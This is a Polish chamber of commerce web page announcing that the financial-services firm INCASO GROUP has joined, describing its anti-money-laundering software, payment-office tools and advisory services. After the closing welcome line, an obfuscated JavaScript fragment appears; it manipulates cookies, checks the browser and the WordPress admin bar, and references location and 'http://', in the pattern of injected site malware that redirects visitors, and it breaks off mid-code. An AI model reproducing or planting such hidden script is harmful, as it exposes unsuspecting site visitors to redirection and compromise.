Nowa Firma w Izbie! | Północna Izba Gospodarcza w Koszalinie

Miła nam poinformować, że do naszej Izby dołączyła nowa firma – INCASO GROUP Sp. z o.o

Misja firmy

Integrujemy świat finansów, biznesu, prawa i technologii, by osoby indywidualne oraz instytucje mogły szybko, intuicyjnie i bezpiecznie pozyskiwać finansowanie, inwestować oraz rozliczać zobowiązania. Pomagamy optymalizować decyzje biznesowe, inteligentnie doradzamy oraz wdrażamy nowoczesne i skuteczne rozwiązania finansowe.

Oferujemy przedsiębiorcom i firmom profesjonalne wsparcie biznesowe, które pomaga osiągać sukces na współczesnych, wymagających rynkach. Nasze działania opieramy na wieloletnim doświadczeniu, nieustannie podnosząc jakość świadczonych usług i udostępnianych rozwiązań.

Rozwiązanie odpowiadające na potrzebę współczesnego rynku, a także na wymagania ustawy regulującej czynności w obszarze przeciwdziałania praniu pieniędzy i finansowaniu terroryzmu. To narzędzie, który nie tylko spełnia wszystkie wymogi prawne, ale także daje użytkownikowi pełen zakres użytecznych i intuicyjnych funkcjonalności, np. możliwość automatycznej analizy transakcji. Autorski system wsparcia procesów obsługi kasowej. Kompleksowe rozwiązanie dla Biur Usług Płatniczych spełniające wszystkie wymogi ustawowe dotyczące raportowania i pozostałych obowiązków względem KNF, GIIF, NBP. Narzędzia tworzone i wciąż rozwijane od 2003 roku we współpracy z największymi bankami i towarzystwami ubezpieczeniowymi. Oferta usług doradczych przeznaczona dla firm z sektora usług finansowych. Dzięki bogatemu doświadczeniu w branży, wiedzy eksperckiej oraz współpracy z wieloma instytucjami, korporacjami i firmami proponujemy rozszerzenie działań w wybranym kierunku, np. sprzedaży ubezpieczeń lub kredytów. Negocjujemy warunki i dostarczamy rozwiązania.

 

Incaso Group Sp. z o.o. | biurowiec Galeria Emka | ul. Jana Pawła II 20 | 75-452 Koszalin

biuro@incasogroup.pl

www.incasogroup.pl

Serdecznie witamy i zapraszamy do współpracy! 'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m